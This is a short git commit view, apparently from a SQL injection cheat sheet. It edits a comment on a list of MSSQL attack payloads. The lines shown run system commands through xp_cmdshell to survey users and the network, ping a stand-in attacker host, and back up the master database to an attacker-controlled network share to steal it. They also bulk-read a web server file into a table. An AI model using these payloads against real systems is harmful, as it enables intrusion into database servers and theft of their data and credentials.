small edit to comment

This commit is contained in:
unix23 2010-05-13 13:53:52 +00:00
parent bbe358e96a
commit 7818740153

View file

@ -11,5 +11,5 @@ exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat' Backup entire database to a file. This attack can be used to steal a database.
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--